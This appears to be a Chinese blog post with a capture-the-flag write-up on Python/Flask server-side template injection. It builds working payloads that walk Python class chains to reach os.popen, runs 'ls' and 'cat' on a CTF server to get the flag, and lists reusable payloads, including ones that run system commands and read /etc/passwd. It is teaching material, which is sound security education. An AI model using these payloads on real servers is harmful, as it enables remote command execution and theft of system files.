
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Web_python_template_injection - pemuse</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="pemuse,"> 
    <meta name="description" content="新火试新茶,Web_python_template_injection解题思路：
首先看到题目，就知道这道题是关于 模板注入 的，什么是模板注入呢？
为了写 html 代码的时候方便，很多网站都会使用模板，先写,"> 
    <meta name="author" content="pemuse"> 
    <link rel="alternative" href="atom.xml" title="pemuse" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content="Web_python_template_injection - pemuse"/>
    <meta name="twitter:description" content="新火试新茶,Web_python_template_injection解题思路：
首先看到题目，就知道这道题是关于 模板注入 的，什么是模板注入呢？
为了写 html 代码的时候方便，很多网站都会使用模板，先写,"/>
    
    
    
    
    <meta property="og:site_name" content="pemuse"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content="Web_python_template_injection - pemuse"/>
    <meta property="og:description" content="新火试新茶,Web_python_template_injection解题思路：
首先看到题目，就知道这道题是关于 模板注入 的，什么是模板注入呢？
为了写 html 代码的时候方便，很多网站都会使用模板，先写,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

    <script>window.searchDbPath = "/search.xml";</script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Source+Code+Pro&display=swap" rel="stylesheet">
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">pemuse</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="https://pemuse.github.io"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">Web_python_template_injection</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="" class="" href=""></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">Web_python_template_injection</h1>
        <div class="stuff">
            <span>四月 13, 2023</span>
            

        </div>
        <div class="content markdown">
            <h1 id="Web-python-template-injection"><a href="#Web-python-template-injection" class="headerlink" title="Web_python_template_injection"></a>Web_python_template_injection</h1><h2 id="解题思路："><a href="#解题思路：" class="headerlink" title="解题思路："></a>解题思路：</h2><ul>
<li>首先看到题目，就知道这道题是关于 <strong>模板注入</strong> 的，什么是模板注入呢？</li>
<li>为了写 html 代码的时候方便，很多网站都会使用模板，先写好一个 html 模板文件，<br>比如：<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">test</span>():</span><br><span class="line">code = request.args.get(<span class="string">&#x27;id&#x27;</span>)</span><br><span class="line">html = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">&lt;h3&gt;%s&lt;/h3&gt;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>%(code)</span><br><span class="line"><span class="keyword">return</span> render_template_string(html)</span><br></pre></td></tr></table></figure>
这段代码中的 <code>html</code> 就是一个简单的模板文件，当开发者想要这个模板对应的样式<br>时，可以直接用 <code>render_template_string</code> 方法来调用这个模板，从而直接把这个样<br>式渲染出来。<br>而模板注入，就是指 <strong>将一串指令代替变量传入模板中让它执行</strong> ，以这段代码为<br>例，我们在传入 <code>code</code> 值时，可以用 <code>&#123;&#123;&#125;&#125;</code> 符号来包裹一系列代码，以此替代本应是<br>参数的 <code>id</code> ：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://..../?id=&#123;&#123;代码&#125;&#125;</span><br></pre></td></tr></table></figure>
<ul>
<li>知道了什么是模板文件，接下来开始模板注入环节:<br>首先，先测试一下是不是确实能注入，构造一个简单的测试 url:<br><code>http://111.198.29.45:46675/&#123;&#123;7*7&#125;&#125;</code><br>服务器回传：<br><code>URL http://111.198.29.45:46675/49 not found</code><br><code>/49</code> 的存在说明 <code>7*7</code> 这条指令被忠实地执行了。<br>接下来，开始想办法编代码拿到服务器的控制台权限：</li>
<li>首先，题目告诉我们这是一个 python 注入问题，那么脚本肯定也是 python 的，思<br>考怎样用 python 语句获取控制台权限：想到了 <code>os.system</code> 和 <code>os.popen</code> (<a target="_blank" rel="noopener" href="https://blog.csdn.net/sxingming/article/details/52071514">参考资<br>料</a>), 这两句前<br>者返回 <strong>退出状态码</strong> , 后者 <strong>以 file 形式</strong> 返回 <strong>输出内容</strong>, 我们想要的是<br>内容，所所以选择 <code>os.popen</code> 。</li>
<li>知道了要用这一句，那么我要怎么找到这一句呢？python 给我们提供了完整的寻找<br>链(<a target="_blank" rel="noopener" href="https://www.cnblogs.com/tr1ple/p/9415641.html">参考资料</a>)：<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">__class__ ： 返回对象所属的类</span><br><span class="line">__mro__ ： 返回一个类所继承的基类元组，方法在解析时按照元组的</span><br><span class="line">顺序解析。</span><br><span class="line">__base__ ： 返回该类所继承的基类</span><br><span class="line">// __base__和__mro__都是用来寻找基类的</span><br><span class="line">__subclasses__ ： 每个新类都保留了子类的引用，这个方法返回一个</span><br><span class="line">类中仍然可用的的引用的列表</span><br><span class="line">__init__ ： 类的初始化方法</span><br><span class="line">__globals__ ： 对包含函数全局变量的字典的引用</span><br></pre></td></tr></table></figure></li>
<li>首先，找到当前变量所在的类：<br><code>111.198.29.45:46675/%7B%7B&#39;&#39;.__class__%7D%7D</code><br>服务器回复：<br><code>URL http://111.198.29.45:46675/&lt;type &#39;str&#39;&gt; not found</code><br>发现这个回复里已经告诉我们 这个变量的类是 ‘str’ 了。</li>
<li>接下来，从这个类找到它的基类：<br><code>http://111.198.29.45:46675/%7B%7B&#39;&#39;.__class__.__mro__%7D%7D</code><br>服务器回复：<br><code>URL http://111.198.29.45:46675/(&lt;type &#39;str&#39;&gt;, &lt;type &#39;basestrin g&#39;&gt;, &lt;type &#39;object&#39;&gt;) not found</code><br>发现基类也有了。</li>
<li>然后，通过基类来找其中任意一个基类的引用列表：<br><a target="_blank" rel="noopener" href="http://111.198.29.45:46675/%7B%7B''.__class__.__mro__[2].__sub">http://111.198.29.45:46675/%7B%7B&#39;&#39;.__class__.__mro__[2].__sub</a><br>classes__()%7D%7D<br>这里有个小细节，<code>__mro__[]</code> 中括号里填谁其实区别都不大，这些基类引用的<br>东西都一样。<br>服务器回复了很长的一个列表，我就不列举了，从其中可以找到我们想要<br>的 <code>os</code> 所在的 <code>site._Printer</code> 类，它在列表的第七十二位，<br>即 <code>__subclasses__()[71]</code> 。</li>
<li>通过 <code>__subclasses__()[71].__init__.__globals__[&#39;os&#39;].popen(&#39;命令 行语句&#39;).read()</code> 来 <strong>调用服务器的控制台</strong> <strong>并显示</strong> ，这下我们就可以随便用<br>控制台输出了。<br>直接填命令语句：<br><code>http://111.198.29.45:46675/%7B%7B&#39;&#39;.__class__.__mro__[2].__sub classes__()[71].__init__.__globals__[&#39;os&#39;].popen(&#39;ls&#39;).read()%7D%7D</code><br>注意这里的 <code>popen(&#39;ls&#39;).read()</code> ,意思是 **得到 ls 的结果并读取给变量<br>** ，因此它会把当前目录所有文件都打印在我们的网页上，内容如下：<br><code>URL http://111.198.29.45:46675/fl4g index.py not found</code><br>从这里我们看到，flag 存在一个叫 <code>fl4g</code> 的无后缀文件里，那就好办了，再<br>构造一个 payload，用 <code>cat</code> 读一下内容：<br><code>http://111.198.29.45:46675/%7B%7B&#39;&#39;.__class__.__mro__[2].__sub classes__()[71].__init__.__globals__[&#39;os&#39;].popen(&#39;cat fl4g&#39;).read()%7D% 7D</code><br>服务器回复：<br><code>URL http://111.198.29.45:46675/ctf&#123;f22b6844-5169-4054-b2a0-d95 b9361cb57&#125; not found</code><br>flag 到手~</li>
</ul>
<h2 id="注意事项："><a href="#注意事项：" class="headerlink" title="注意事项："></a>注意事项：</h2><ul>
<li><pre><code class="python">&#39;&#39;.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[&#39;
os&#39;].popen(&#39;cat fl4g&#39;).read()
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">```</span><br><span class="line"></span><br></pre></td></tr></table></figure>
以上 payload 是一个非常常用的 payload，同样常用的还有
​```python
&#39;&#39;.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[&#39;
os&#39;].system(&#39;ls&#39;)
</code></pre>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">和</span><br><span class="line">​```python</span><br><span class="line">&#x27;&#x27;.__class__.__mro__[2].__subclasses__()[40](&#x27;/etc/passwd&#x27;).read()</span><br></pre></td></tr></table></figure>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="//img/xing.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="http://m10.music.126.net/20230413231258/c88443ed0372910ef37211f25703a101/ymusic/2d31/cbe1/b405/9694012993255d512f94cb24e8d760bd.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
        
    <div id="gitalk-container" class="comment link"
		data-enable="true"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


    </div>
    
        <div class="side">
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-python-template-injection"><span class="toc-number">1.</span> <span class="toc-text">Web_python_template_injection</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">1.1.</span> <span class="toc-text">解题思路：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9%EF%BC%9A"><span class="toc-number">1.2.</span> <span class="toc-text">注意事项：</span></a></li></ol></li></ol>
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
